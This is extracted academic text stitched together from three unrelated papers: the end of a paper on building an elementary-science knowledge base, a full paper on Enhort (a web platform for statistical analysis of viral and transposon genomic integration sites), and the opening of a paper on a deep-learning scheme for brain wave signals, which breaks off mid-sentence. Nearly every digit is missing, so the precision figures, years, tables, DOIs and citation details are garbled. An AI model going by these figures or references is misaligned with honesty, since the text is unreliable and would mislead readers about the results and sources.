all, most, or some arg s?) that can affect downstream inference. we are exploring methods for quantification sharpening, e.g., (gordon and schubert, ), to address this. . can the pipeline be easily adapted to a new domain? our proposed extraction pipeline expects high-quality vocabulary and types information as input. in many domains, it is easy to import types from existing resources like wordnet or freebase. for other domains like medicine, legal it might require domain experts to encode this knowledge. however, we believe that manually encoding types is a much simpler task as compared to manually defining all the schemas relevant for an individual domain. further, various design choices, e.g., precision vs. recall tradeoff of final kb, the amount of expert input available, etc. would depend on the domain and end task requirements. conclusion our goal is to construct, a domain-targeted, high precision knowledge base of (sub- ject,predicate,object) triples to support an ele- mentary science application. we have presented a scalable knowledge extraction pipeline that is able to extract a large number of facts targeted to a particular domain. the pipeline leveraging open ie, crowdsourcing, and a novel schema learning algorithm, and has produced a kb of over , facts at . % precision for elementary science qa. we have also introduced a metric of comprehen- siveness for measuring kb coverage with respect to a particular domain. applying this metric to our kb, we have achieved a comprehensiveness of over % of science facts within the kb’s expressive power, substantially higher than the science coverage of other comparable resources. most importantly, the pipeline offers for the first time a viable way of ex- tracting large amounts of high-quality knowledge targeted to a specific domain. we have made the kb publicly available at http://data.allenai. org/tuple-kb. acknowledgments we are grateful to paul allen whose long-term vision continues to inspire our scientific endeav- ors. we would also like to thank peter turney and isaac cowhey for their important contributions to this project. references s. auer, c. bizer, j. lehmann, g. kobilarov, r. cyga- niak, and z. ives. . dbpedia: a nucleus for a web of open data. in in iswc/aswc. michele banko, michael j. cafarella, stephen soderland, matthew broadhead, and oren etzioni. . open information extraction from the web. in ijcai, vol- ume , pages – . jonathan berant, ido dagan, and jacob goldberger. . global learning of typed entailment rules. in acl. kurt bollacker, colin evans, praveen paritosh, tim sturge, and jamie taylor. . freebase: a collabo- ratively created graph database for structuring human knowledge. in sigmod. thorsten brants and alex franz. . web t - gram version ldc t . philadelphia: linguis- tic data consortium. andrew carlson, justin betteridge, bryan kisiel, burr settles, estevam r hruschka jr, and tom m mitchell. . toward an architecture for never-ending lan- guage learning. in aaai, volume , page . bhavana dalvi, sumithra bhakthavatsalam, chris clark, peter clark, oren etzioni, anthony fader, and dirk groeneveld. . ike - an interactive tool for knowledge extraction. in akbc@naacl-hlt. luciano del corro, rainer gemulla, and gerhard weikum. . werdy: recognition and disambigua- tion of verbs and verb phrases with syntactic and se- mantic pruning. in conference on empirical methods in natural language processing, pages – . acl. karthik dinakar, birago jones, catherine havasi, henry lieberman, and rosalind picard. . common sense reasoning for detection, prevention, and mitiga- tion of cyberbullying. acm transactions on interac- tive intelligent systems (tiis), ( ): . xin dong, evgeniy gabrilovich, geremy heitz, wilko horn, ni lao, kevin murphy, thomas strohmann, shaohua sun, and wei zhang. . knowledge vault: a web-scale approach to probabilistic knowl- edge fusion. in kdd. alexander faaborg and henry lieberman. . a goal- oriented web browser. in proceedings of the sigchi conference on human factors in computing systems, pages – . acm. anthony fader, stephen soderland, and oren etzioni. . identifying relations for open information ex- traction. in proceedings of the conference on empiri- cal methods in natural language processing, pages – . association for computational linguis- tics. reverb- m available at http://openie. cs.washington.edu. christiane fellbaum. . wordnet. wiley online li- brary. luis galárraga, christina teflioudi, katja hose, and fabian m. suchanek. . amie: association rule mining under incomplete evidence in ontological knowledge bases. in www. luis galárraga, geremy heitz, kevin murphy, and fabian m. suchanek. . canonicalizing open knowledge bases. in cikm. jonathan gordon and lenhart k schubert. . quan- tificational sharpening of commonsense knowledge. in aaai fall symposium: commonsense knowledge. adam grycner and gerhard weikum. . harpy: hy- pernyms and alignment of relational paraphrases. in coling. adam grycner, gerhard weikum, jay pujara, james r. foulds, and lise getoor. . relly: inferring hy- pernym relationships between relational phrases. in emnlp. dekang lin and patrick pantel. . dirt - discov- ery of inference rules from text. in proceedings of the seventh acm sigkdd international conference on knowledge discovery and data mining, pages – . acm. hugo liu and push singh. . conceptnet: a prac- tical commonsense reasoning tool-kit. bt technology journal, ( ): – . mausam, michael schmitz, stephen soderland, robert bart, and oren etzioni. . open language learning for information extraction. in emnlp. andrea moro and roberto navigli. . wisenet: building a wikipedia-based semantic network with on- tologized relations. in cikm. patrick pantel, rahul bhagat, bonaventura coppola, timothy chklovski, and eduard h hovy. . isp: learning inferential selectional preferences. in hlt- naacl, pages – . hannes planatscher and michael schober. . scp solver. http://scpsolver.org. simon razniewski, fabian m suchanek, and werner nutt. . but what do we actually know? in proc. akbc’ . sebastian riedel, limin yao, andrew mccallum, and benjamin m. marlin. . relation extraction with matrix factorization and universal schemas. in hlt- naacl. richard socher, danqi chen, christopher d. manning, and andrew y. ng. . reasoning with neural ten- sor networks for knowledge base completion. in nips. stephen soderland, john gilmer, robert bart, oren et- zioni, and daniel s. weld. . open information extraction to kbp relations in hours. in tac. robert speer and catherine havasi. . concept- net : a large semantic network for relational knowl- edge. in the peoples web meets nlp, pages – . springer. gabriel stanovsky and ido dagan. . creating a large benchmark for open information extraction. in emnlp. fabian m. suchanek, gjergji kasneci, and gerhard weikum. . yago: a core of semantic knowl- edge. in www. niket tandon, gerard de melo, fabian suchanek, and gerhard weikum. . webchild: harvesting and organizing commonsense knowledge from the web. in wsdm. peter d. turney, yair neuman, dan assaf, and yohai co- hen. . literal and metaphorical sense identifica- tion through concrete and abstract context. in emnlp. travis wolfe, mark dredze, james mayfield, paul mc- namee, craig harman, timothy w. finin, and ben- jamin van durme. . interactive knowledge base population. corr, abs/ . . alexander yates and oren etzioni. . unsupervised methods for determining object and relation synonyms on the web. journal of artificial intelligence research. submitted november accepted may published june corresponding author andreas gogol-döring, andreas.gogol-doering@mni.thm.de academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright menzel et al. distributed under creative commons cc-by . open access enhort: a platform for deep analysis of genomic positions michael menzel, peter koch, stefan glasenhardt and andreas gogol-döring mni, technische hochschule mittelhessen—university of applied sciences, giessen, hessen, germany abstract the rise of high-throughput methods in genomic research greatly expanded our knowledge about the functionality of the genome. at the same time, the amount of available genomic position data increased massively, e.g., through genome-wide profiling of protein binding, virus integration or dna methylation. however, there is no specialized software to investigate integration site profiles of virus integration or transcription factor binding sites by correlating the sites with the diversity of available genomic annotations. here we present enhort, a user-friendly software tool for relating large sets of genomic positions to a variety of annotations. it functions as a statistics based genome browser, not focused on a single locus but analyzing many genomic positions simultaneously. enhort provides comprehensive yet easy-to-use methods for statistical analysis, visualization, and the adjustment of background models according to experimental conditions and scientific questions. enhort is publicly available online at enhort.mni.thm.de and published under gnu general public license. subjects bioinformatics, computational biology keywords virology, data analysis, genome annotation, next-generation sequencing, integration profiling introduction some viruses like hiv (craigie & bushman, ) and aav (deyle & russell, ) are able to copy their genomic sequence into the genome of an infected cell. this can have severe impact on host cell stability as the integration may hit and disable a gene or a regulatory region. the investigation of characteristics and underlying driving factors for virus integration is not only relevant for virology and infectious diseases research but also for approaches in gene therapy that apply virus-derived vectors and transposons to deliver functional dna fragments into host cells (riviere, dunbar & sadelain, ; li et al., ). each gene delivery system has its own mechanisms for genomic integration and preferences for choosing integration sites, hence different systems may have different risks for causing undesired side effects. next generation sequencing (ngs) facilitates the genome-wide profiling of integration sites, as they are collected e.g., in investigations of protein binding, virus/transposon integration or dna methylation. integration sites are available from databases like the retrovirus integration database (shao et al., ) and are regularly created for novel targeted vectors. typically, the identified sites are related to a variety of genomic features and any integration preferences are determined by a comparison of actual integration sites to a set of random control sites (gogol-döring et al., ). a proper background how to cite this article menzel m, koch p, glasenhardt s, gogol-döring a. . enhort: a platform for deep analysis of genomic posi- tions. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:andreas.gogol-doering@mni.thm.de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. model should mimic all known biases of the signal data originating from experimental or laboratory conditions. if, for example, a profiling method is only capable of detecting integration events that are close to certain enzyme restriction sites then the control sites should also be selected accordingly. several tools have been published that are capable of processing genomic positions and annotations, like the genomic hyperbrowser (sandve et al., ). genome browsers like the ucsc genome browser (kent et al., ), igv (robinson et al., ) or artemis (carver et al., ) are designed for inspecting single genomic locations. also custom written scripts are commonly used for the analysis of genomic positions (cook et al., ) or libraries like pybedtools (janovitz et al., ; dale, pedersen & quinlan, ). once written these scripts have the benefit of being a reusable option to conduct a specific set of analysis on recurring data. however, they are limited by the available functionality because each function has be newly developed. additionally, comparability across laboratories is afflicted by varying functionality and different implementations of background models. there is yet no specialized tool for genomic positions analysis that combines the features of instant analysis and user defined adaptable background models that mimic known biases. in this paper we present enhort, a user-friendly web-platform for deep analysis of large sets of genomic positions. our aim is to accelerate and simplify the data analysis process as well as to standardize it in order to increase reproducibility. enhort is capable of adjusting background sites used for comparison by user selected covariates. this includes annotation tracks like restriction sites or chromatin accessibility, gene expression tracks and sequence motifs. with covariates it is possible to adjust the background sites selection in a way that they match the investigated sites for a specific track. the adaptation rules out the effects of this annotation for the background. this feature can be used to adjust for experimental bias as well as specific questions. figure shows the schematic process of data gathering and the usage of enhort in the workflow of analyzing genomic positions. methods integration sites of viruses are gathered by sequencing infected cells and preprocessing as shown in fig. . these sites are uploaded to enhort and are intersected with each annotation file to compute fold-change enrichment and χ test in comparison to control sites, yielding a measure for effect strength and significance of each annotation respectively. figure shows the schematic analysis pathway for sites uploaded by a user. statistical analysis depends on the apache commons math library (https://commons.apache.org/proper/commons- math/) and uses bonferroni correction for multiple hypothesis testing. the libraries plotly.js (https://plot.ly/javascript/) and circos (http://circos.ca/) are used for visualization. the results are sorted according to their relevance and presented in conjunction with appropriate figures. example results for a virus can be seen in fig. a. the software has been designed in a way that analysis results are almost immediately available after upload. in many cases a background model consisting of random sites is not sufficient for an adequate analysis. some protocols, for example, can only detect integration events that menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://commons.apache.org/proper/commons-math/ https://commons.apache.org/proper/commons-math/ https://plot.ly/javascript/ http://circos.ca/ http://dx.doi.org/ . /peerj-cs. virus virusdna sequencing reads genomic sequence mapping w et l ab p re pr oc es si ng site site other data sources e nh or t sets of sites background model generation statistical analysis output generation genomic annotations results hit hit hit chr chr chr figure overview of preparatory work and data gathering for analysis in enhort. reads containing vi- ral integration sites are identified and sequenced in the weblab and mapped to a reference genome. iden- tified insertion sites are converted to a bed file for the usage in enhort. together with genomic annota- tions from public database the analysis in enhort is conducted to generated analysis of the given integra- tion sites. full-size doi: . /peerjcs. /fig- occurred in close proximity to a restriction site of a specific enzyme, like ecori, which cuts inside of gaattc hexamers (pingoud & jeltsch, ). background models should be adapted to mimic the actual integration pattern with regard to any known technical bias. in this case, the control sites should also be selected to be near restriction sites. this can be achieved in enhort by setting the appropriate genome annotation as a covariate. when selecting the track that contains all possible genomic positions of gaattc hexamers as covariate, enhort will generate a set of control sites having exactly the same distribution of distances to the enzyme restriction sites as the actual virus integration sites. menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. sites are uploaded by a user background sites are created ( ) user sites are tested against the background ( ) tables and figures are shown export results user selects covariates length of all integration intervals is determined random positions are set between and the combined interval length random positions are spread according to interval locations on the genome positions for each combination are merged input: site count covariates genome version count number of sites inside intervals for user and background sites contingency table χ test, correction for multiple testing and fold change input: user sites background sites for each track for each combination for each combination for each track annotation tracks from databases : : figure flowchart of the procedure of analysis performed by enhort. blue boxes show the steps to cre- ate a background model based on multiple covariates. random positions have to be set for each combi- nation of covariates. green boxes show the steps to test the user sites against the background sites. the re- sults are returned as a table and converted into figures for the user. full-size doi: . /peerjcs. /fig- covariates help to adapt the background model both for technical circumstances, for example, restriction sites and for eliminating a bias or biological preferences such as motifs or genetic features. covariates can also be used to identify dependent or separate weak integration preferences that are covered by stronger effects, as shown in fig. b. mlv integration sites are compared to two different control sets: a random and an altered background, to identify the actual integration preferences; e.g., for histone mark h k me , which is a known preference of mlv (gogol-döring et al., ). for the validity of statistical testing it is usually indispensable to normalize the background model relative to multiple covariates. for that purpose, enhort supports the selection of multiple covariates simultaneously in order to further investigate the integration site characteristics. for example, enhort may create a control set that considers chromatin accessibility, restriction site distance as well as several histone modifications simultaneously. this functionality is needed to build background models for sites that are influenced by multiple factors, e.g., biological and technical biases. a set of additional features listed in the following table: . statistical analysis for annotation tracks: (a) fold change (b) χ test (c) kolmogorov–smirnov test . hotspot analysis (fig. c) . position depended enrichment (fig. a) . background models based on: menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure output view example, generated by enhort when analyzing murine leukemia virus (mlv) integration sites in cd + t cells (roth, malani & bushman, ). (a) the results are presented in a table containing for each annotation the p value, effect size and a visual representation of the integration. the annotations are ranked by effect strength. (b) effect of covariate selection. the upper diagram con- tains integration frequencies of mlv compared to random sites for a selection of annotations. this virus is known for preferentially integrating near transcription start sites (tss) and h k me histone marks (lafave et al., ). the lower diagram shows the same data after selecting h k me as covariate. the adapted background model is generated in a way that control sites and mlv integration sites have the same frequency relative to h k me . this also changed the control site frequencies for other annotations: mlv integration is no longer enriched but depleted in cpg islands when compared to the adapted back- ground model. full-size doi: . /peerjcs. /fig- (a) inside and outside of annotations (b) distance to annotations (c) scored annotations (d) sequence logo . upload background sites . comparing effects of different background models . batch analysis of multiple integration sets . heatmaps to compare integration sets (fig. b) . custom annotation tracks . blend annotation tracks . export results as r code and csv files enhort is separated into a lightweight, web-based user interface and a high performance back-end server attached to a sqlite database storing meta-information about the annotations fetched from deepblue (albrecht et al., ). results from enhort are instantaneously available as seen in table where the run times for different input sizes are shown. our application currently offers annotation tracks from cell menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table analysis execution times for different usual site counts, annotation tracks from hg and co- variate counts. (back-end server: supermicro superserver b-trft x intel xeon e - v with gb ddr ecc lr). track count , covariate count site count execution time (ms) k , , , , , k , , , , , k , , , , k , , , , k , , , , k , , , , lines and tissues for human genome assemblies hg and hg , downloaded from ucsc genome browser (fujita et al., ), encode (encode project consortium, ), chip-atlas (http://chip-atlas.org), blueprint epigenome (adams et al., ) and roadmap epigenomics (roadmap epigenomics consortium et al., ) using the deepblue epigenomic data server (albrecht et al., ). results and discussion literature review we reviewed the relevance of enhort for contemporary research by systematically searching pubmed, google scholar, and several review articles for publications concerning the analysis of genomic integration sites. the publications include virus integration site analysis for hiv, mlv, hrp- , siv, foamy virus, hpv, aav and transposons such as piggybac, line- , alu and sleeping beauty. in total we identified relevant publications. details on the reviewed publications and methodological analysis are available in the table s . of these publications used completely random control sites, only six used adapted control sites. the data analyses presented in ( %) publications could have been entirely performed with our tool. six further publications use at least some methods provided by enhort. we assume that if they had the opportunity to use enhort the authors would have saved a lot of effort writing custom analysis scripts. data re-analysis to further present the capabilities of enhort we re-analyzed integration sites of the piggybac transposon (pb) published by gogol-döring et al. ( ) using enhort. results from wilson, coates & george ( ) are used for comparison. pb integration characteristics show a preference for genes, exons, introns, highly expressed genes, dnase i hypersensitive sites, h k me and open chromatin structures (wilson, coates & george, ; li et al., ). we uploaded the pb integration sites to enhort, selected all relevant tracks and finally exported the results. figure a shows the log fold changes for a selection of annotations for pb against a random background in grey. figure b shows the sequence logos for the menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://chip-atlas.org http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure additional plots generated by enhort. (a) circos plot (krzywinski et al., ) of position de- pendent enrichment over all chromosomes for mlv for the most significant tracks. (b) heatmap for a set of three integration data sets against various annotations. the values are log -fold changes of the numbers of integration vs control sites falling into a given annotation. star symbols mark statistically significant changes. the same background sites are used for the comparisons. the background sites are adapted to in- tegrate only inside the sequence contigs. (c) integration hotspots across the genome for mlv. the color intensity of the thin bars show the integration ratio inside of the respective genomic region. full-size doi: . /peerjcs. /fig- pb integration sites and the random background. the barplots were created using the r-export feature of enhort. the key feature of the pb integration preference is the ttaa motif in which all integrations occur. to precisely analyze the preferences of pb integration the background model has to be adapted to replicate the ttaa motif preference. this can be achieved using enhort by creating a set of pseudo-random control sites that are located only inside a ttaa sequence. to achieve this, we simply selected the sequence logo as a covariates. enhort takes genomic positions from a pre-sampled set of positions where each position has a probability based on the similarity between the surrounding sequence and the ttaa sequence. the results are shown in fig. c where the background sites and pb show a similar motif after the motif is added as a covariate using enhort. the motif adaption also changes the observed integration characteristics seen in fig. a. the relative decreased integration of pb into coding exons is changed to a significant preference, because cpg islands are less likely to be hit by a site from the adapted background model, as ttaa occurs relatively less frequent in cpg islands. the same applies to dnase cluster regions, tss and exons, where the significance of integration is enriched in comparison to a random background. only a small change for the enrichment in introns and genes is visible. overall menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure analysis of pb integration sites. (a) log fold changes of pb integration sites in relation to sev- eral annotations against a random and an adapted background model. changing the background model to adapt the ttaa motif changes the observation of several integration preferences. (b) the pb motif and random sites motif, corresponding with the random background bars in (a). (c) motif of the random sites after adaption to the pb motif using enhort. full-size doi: . /peerjcs. /fig- table log fold changes and integration ratios of wilson, coates & george ( ) in comparison to enhort for two pb integration site sets. enhort wilson et al. enhort wilson et al. enhort wilson et al. annotation track fold change fold change pb (%) pb (%) random (%) random (%) refseq genes . . . . . . tss (± kb) . . . . . . cpg islands (± kb) . . . . . . cpg islands (± kb) . . . . . . repeats: line . . . . . . sine . . . . . . ltr . . . . . . dna . . . . . . this indicates that beside the ttaa preference of pb there are additional mechanisms that alter the integration preferences. using the background adaption feature of enhort it would be possible to test different hypothesis against the data and build a model that explains the integration preferences. to further review the analytic capabilities of our software, the integration counts of pb sites are compared to published results from wilson, coates & george ( ). the comparison can be seen in table . an increased integration of pb into refseq genes, inside the kb-tss window, as well as a preference for cpg islands is observable for both analyses. wu et al. ( ) published a study on mlv and hiv stating that mlv favors tss regions, whereas hiv does not display a strong preference towards tss regions. the menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table comparison between fold changes of wu et al. ( ) and enhort over different annotations on the same integration sites. wu et al. enhort hiv mlv hiv mlv hiva mlva hivb mlvb refseq genes . * . * . * . * housekeeping genes – – . * . . * . . * . cpg islands (± kb) * . . * . . * . . * tss (± kb) . * . * . . * . . * h k me – – . * . * . * . * . * . * h k me – – . . * . . * . . * h k ac – – . . * . . * . . * notes. *p < . . awith refseq genes as covariate. bwith refseq genes and tss (± kb) as covariates. available integration sites were uploaded to enhort and analyzed using the batch tool with a random , site background model. the results from enhort show a similar integration pattern as stated in wu et al. ( ) (table ). except for cpg islands for hiv where wu et al. found a near random integration and we found a decreased integration. for further review, hiv and mlv integration sites were uploaded independently to enhort, and refseq genes added as covariate. this background model had only a little effect on mlv as the preference for tss and cpg islands only changed slightly, indicating that the preference for tss is not due to a preference for refseq genes. for the hiv integration sites the housekeeping genes, which are a known preference of hiv (craigie & bushman, ), are still statistically significant against this background model. finally, refseq genes and tss (± kb) were both used as covariates together, showing that the integration ratio of mlv into cpg islands with a (± kb) window decreases slightly. this shows that the integration into the cpg islands is probably not a side effect of the preference for tss or genes. the combined background model with refseq genes and tss does not have any influence on the hiv fold changes compared to the previous background model. the creation of each background model and comparing the results was possible using built-in features of enhort. we further added histone modifications to the analysis showing that h k me is significantly enriched for both integration sets and does not change significantly for the different background models. this indicates that the histone modification preferences is an additional effect, only slightly influenced by the preference for genes and tss. h k me and h k ac are known preferences of mlv (de ravin et al., ) and show a high fold change for all background models. with the available database it would be easy to add numerous additional annotations for comparison. we have shown that enhort is capable of reproducing integration site analysis with less effort and additionally offers easy-to-use mechanisms to create more sophisticated analysis using adaptable background models. the exact annotation files were not available for comparison, so it was not possible to produce the exact numbers. however, enhort uses menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the same calculation principle. with the same annotations and sites the results by enhort would be the same as in the referenced publications. conclusion in this publication we present enhort, a fast and easy-to-use analyzing platform for genomic positions. based on a comprehensive library of genomic annotations, enhort provides a wide range of methods to analyze large sets of sites. in contrast to multi-purpose software such as bioconductor, enhort enables scientists to analyze data without programming effort or extensive manual work. our literature review shows that enhort is able to perform most of the analyses commonly used in the investigation of integration sites. the re-analysis of wilson, coates & george ( ) and wu et al. ( ) demonstrates that enhort is able to reproduce analyses from literature with little effort. it was not possible to reproduce the exact values, because the version of the annotation was not recorded in the publications. however, more detailed insights can be made using adaptable background models. this was shown in the comparison of hiv and mlv from wu et al. against different control sites. most publications use very simple background models for statistical analysis of integration data and could potentially be improved using better background models. enhort provides methods to easily create more sophisticated background models for improving both the accuracy and the range of possible analyses. complex background models can be used to identify weak effects and segregate driving factors for integration, find a minimal set of annotations to mimic integration characteristics, as well as to eliminate technical biases. in conclusion, this shows that enhort will be a valuable tool for further analyses of genomic positions, no matter if these positions are derived from virus integration, sequence motifs, enzyme restrictions, histone modifications, or protein binding. additional information and declarations funding this work was supported by the hessen state ministry for higher education, research and the arts. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: hessen state ministry for higher education, research and the arts. competing interests the authors declare there are no competing interests. author contributions • michael menzel conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • peter koch contributed reagents/materials/analysis tools, performed the computation work. • stefan glasenhardt contributed reagents/materials/analysis tools, performed the computation work. • andreas gogol-döring prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the source code and build instructions are available at https://git.thm.de/mmnz / enhort. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references adams d, altucci l, antonarakis s, ballesteros j, beck s, bird a, bock c, boehm b, campo e, caricasole a, dahl f, dermitzakis e, enver t, esteller m, estivill x, ferguson-smith a, fitzgibbon j, flicek p, schacht c, willcocks s. . blueprint to decode the epigenetic signature written in blood. nature biotech- nology ( ): – doi . /nbt. . albrecht f, list m, bock c, lengauer t. . deepblue epigenomic data server: programmatic data retrieval and analysis of epigenome region sets. nucleic acids research (w ):w –w doi . /nar/gkw . carver t, harris sr, berriman m, parkhill j, mcquillan ja. . artemis: an inte- grated platform for visualization and analysis of high-throughput sequence-based ex- perimental data. bioinformatics ( ): – doi . /bioinformatics/btr . cook lucy b, melamed a, niederer h, valganon m, laydon d, foroni l, taylor gp, matsuoka m, bangham crm. . the role of htlv- clonality, proviral structure, and genomic integration site in adult t-cell leukemia/lymphoma. blood ( ): – doi . /blood- - - . craigie r, bushman fd. . hiv dna integration. cold spring harbor perspectives in medicine ( ):article doi . /cshperspect.a . dale rk, pedersen bs, quinlan ar. . pybedtools: a flexible python library for manipulating genomic datasets and annotations. bioinformatics ( ): – doi . /bioinformatics/btr . de ravin ss, su l, theobald n, choi u, macpherson jl, poidinger m, symonds g, pond sm, ferris al, hughes sh, hl m, x w. . enhancers are major targets for murine leukemia virus vector integration. journal of virology ( ): – doi . /jvi. - . menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://git.thm.de/mmnz /enhort https://git.thm.de/mmnz /enhort http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /nbt. http://dx.doi.org/ . /nar/gkw http://dx.doi.org/ . /bioinformatics/btr http://dx.doi.org/ . /blood- - - http://dx.doi.org/ . /cshperspect.a http://dx.doi.org/ . /bioinformatics/btr http://dx.doi.org/ . /jvi. - http://dx.doi.org/ . /peerj-cs. deyle dr, russell dw. . adeno-associated virus vector integration. current opinion in molecular therapeutics ( ): – . encode project consortium. . the encode (encyclopedia of dna elements) project. science ( ): – doi . /science. . fujita pa, rhead b, zweig as, hinrichs as, karolchik d, cline ms, goldman m, barber gp, clawson h, coelho a, diekhans m, dreszer tr, giardine bm, harte ra, hillman-jackson j, hsu f, kirkup v, kuhn rm, learned k, li ch, meyer lr, pohl a, raney bj, rosenbloom kr, smith ke, haussler d, kent wj. . the ucsc genome browser database: update . nucleic acids research (suppl )d –d doi . /nar/gkq . gogol-döring a, ammar i, gupta s, bunse m, miskey c, chen wei, uckert w, schulz tf, izsvák z, ivics z. . genome-wide profiling reveals remarkable parallels between insertion site selection properties of the mlv retrovirus and the piggybac transposon in primary human cd + t cells. molecular therapy ( ): – doi . /mt. . . janovitz t, oliveira t, sadelain m, falck-pedersen e. . highly divergent integration profile of adeno-associated virus serotype revealed by high-throughput sequencing. journal of virology ( ): – doi . /jvi. - . kent wj, sugnet cw, furey ts, roskin km, pringle tom h, zahler am, haussler d. . the human genome browser at ucsc. genome research ( ): – doi . /gr. . krzywinski mi, schein je, birol i, connors j, gascoyne r, horsman d, jones sj, marra ma. . circos: an information aesthetic for comparative genomics. genome research ( ): – . lafave mc, varshney gk, gildea de, wolfsberg tg, baxevanis ad, burgess sm. . mlv integration site selection is driven by strong enhancers and active promoters. nucleic acids research ( ): – doi . /nar/gkt . li ma, pettitt sj, eckert s, ning z, rice s, cadianos j, yusa k, conte n, bradley a. . the piggybac transposon displays local and distant reintegration preferences and can cause mutations at noncanonical integration sites. molecular and cellular biology ( ): – doi . /mcb. - . li l, zhang d, li p, damaser m, zhang y. . virus integration and genome influence in approaches to stem cell based therapy for andro-urology. advanced drug delivery reviews – : – doi . /j.addr. . . . pingoud a, jeltsch a. . structure and function of type ii restriction endonucleases. nucleic acids research ( ): – doi . /nar/ . . . riviere i, dunbar ce, sadelain m. . hematopoietic stem cell engineering at a crossroads. blood ( ): – doi . /blood- - - . roadmap epigenomics consortium, kundaje a, meuleman w, ernst j, bilenky m, yen a, heravi-moussavi a, kheradpour p, zhang z, wang j, ziller mj, amin v, whitaker jw, schultz md, ward ld, sarkar a, quon g, sandstrom rs, eaton ml, wu y-c, pfenning ar, wang x, claussnitzer m, liu y, coarfa c, harris ra, shoresh n, epstein cb, gjoneska e, leung d, xie w, hawkins rd, lister r, menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /science. http://dx.doi.org/ . /nar/gkq http://dx.doi.org/ . /mt. . http://dx.doi.org/ . /jvi. - http://dx.doi.org/ . /gr. http://dx.doi.org/ . /nar/gkt http://dx.doi.org/ . /mcb. - http://dx.doi.org/ . /j.addr. . . http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . /blood- - - http://dx.doi.org/ . /peerj-cs. hong c, gascard p, mungall aj, moore r, chuah e, tam a, canfield tk, hansen rs, kaul r, sabo pj, bansal ms, carles a, dixon jr, farh k-h, feizi s, karlic r, kim a-r, kulkarni a, li d, lowdon r, elliott g, mercer tr, neph sj, onuchic v, polak p, rajagopal n, ray p, sallari rc, siebenthall kt, sinnott-armstrong na, stevens m, thurman re, wu j, zhang b, zhou x, beaudet ae, boyer la, de jager pl, farnham pj, fisher sj, haussler d, jones sjm, li w, marra ma, mcmanus mt, sunyaev s, thomson ja, tlsty td, tsai l-h, wang wei, waterland ra, zhang mq, chadwick lh, bernstein be, costello jf, ecker jr, hirst m, meissner a, milosavljevic a, ren b, stamatoyannopoulos ja, wang t, kellis m. . integrative analysis of reference human epigenomes. nature ( ): – doi . /nature . robinson jt, thorvaldsdóttir h, winckler w, guttman m, lander es, getz g, mesirov jp. . integrative genomics viewer. nature biotechnology ( ): – doi . /nbt. . roth sl, malani n, bushman fd. . gammaretroviral integration into nucleosomal target dna in vivo. journal of virology ( ): – doi . /jvi. - . sandve gk, gundersen s, johansen m, glad i, gunathasan k, holden l, holden m, liestl k, nygrd s, nygaard v, paulsen j, rydbeck h, trengereid k, clancy t, drabls f, ferkingstad e, kala m, lien t, rye mb, frigessi a, hovig e. . the genomic hyperbrowser: an analysis web server for genome-scale data. nucleic acids research (w ):w –w doi . /nar/gkt . shao w, shan j, kearney mf, wu x, maldarelli f, mellors jw, luke b, coffin jm, hughes sh. . retrovirus integration database (rid): a public database for retroviral insertion sites into host genomes. retrovirology ( ):article doi . /s - - - . wilson mh, coates cj, george al. . piggybac transposon-mediated gene transfer in human cells. molecular therapy ( ): – doi . /sj.mt. . wu x, li y, crise b, burgess sm. . transcription start regions in the human genome are favored targets for mlv integration. science ( ): – doi . /science. . menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nature http://dx.doi.org/ . /nbt. http://dx.doi.org/ . /jvi. - http://dx.doi.org/ . /nar/gkt http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /sj.mt. http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. optical+: a frequency-based deep learning scheme for recognizing brain wave signals optical+: a frequency-based deep learning scheme for recognizing brain wave signals shiu kumar , ronesh sharma and alok sharma , , school of electrical and electronic engineering, fiji national university, suva, fiji stemp, university of the south pacific, suva, fiji institute for integrated and intelligent systems, griffith university, brisbane, australia laboratory for medical science mathematics, riken center for integrative medical sciences, yokohama, kanagawa, japan abstract a human–computer interaction (hci) system can be used to detect different categories of the brain wave signals that can be beneficial for neurorehabilitation, seizure detection and sleep stage classification. research on developing hci systems using brain wave signals has progressed a lot over the years. however, real-time implementation, computational complexity and accuracy are still a concern. in this work, we address the problem of selecting the appropriate filtering frequency band while also achieving a good system performance by proposing a frequency-based approach using long short-term memory network (lstm) for 